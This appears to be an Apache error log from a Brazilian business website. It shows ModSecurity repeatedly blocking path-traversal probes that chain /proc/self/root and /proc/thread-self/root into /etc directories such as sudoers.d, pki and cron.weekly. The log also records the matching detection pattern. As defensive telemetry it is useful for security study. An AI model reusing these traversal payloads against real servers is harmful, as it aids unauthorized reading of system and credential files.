[Tue Mar 17 16:56:29.834459 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:53220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx7Rj0p0SRWAqcjGGK6gAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:32.907383 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:53232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx8PPqhzTj3BvfDX-ZLwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:36.423997 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.243.128:60342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx9HIk7brgkOH-rIWeAQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:56:36.762238 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:53244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx9Na6ubjKNq_cu4YZvQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:39.098724 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:59674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx9weiSKl8TjouI-YpcQAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:40.919476 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.31:59680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx-K4xEDsg_V3ESNZdDAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:42.546494 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:59694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx-qBJNF7axNlVR0UqIAAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:44.680744 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:59702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx_K4xEDsg_V3ESNZdEAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:46.181512 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:59714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmx_ta6ubjKNq_cu4YZwQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:48.141766 2026] [proxy_fcgi:error] [pid 7437:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45092] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:56:48.903035 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:51526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyAIh-PF_25v4hFRB8qQAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:52.287930 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:51532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyBPPqhzTj3BvfDX-ZNwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:56:57.680310 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:51602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyCda6ubjKNq_cu4YZzQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:02.414543 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.243.128:52014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyDhj0p0SRWAqcjGGLBQAAAxg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:57:03.426378 2026] [:error] [pid 29151:tid 140411683178240] [client 74.7.241.31:51604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyD_PqhzTj3BvfDX-ZPQAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:09.670343 2026] [:error] [pid 25836:tid 140411557287680] [client 74.7.243.128:40706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyFYh-PF_25v4hFRB8vAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:57:10.123991 2026] [proxy_fcgi:error] [pid 18380:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45582] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:57:10.387014 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.31:41780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyFgeiSKl8TjouI-YpfQAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:13.599628 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:41796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyGa4xEDsg_V3ESNZdJAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:19.981997 2026] [core:alert] [pid 19507:tid 140411674785536] [client 74.7.241.31:58532] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:20.575030 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:58534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyIMU6Sx0TG1YjmQjAXwAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:23.880609 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:58550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyI9a6ubjKNq_cu4YZ3gAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:28.331092 2026] [:error] [pid 7004:tid 140411616036608] [client 74.7.243.128:35042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyKMU6Sx0TG1YjmQjAZgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:57:30.241818 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.128:36980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmyKQeiSKl8TjouI-YphQAAA9A"], referer: 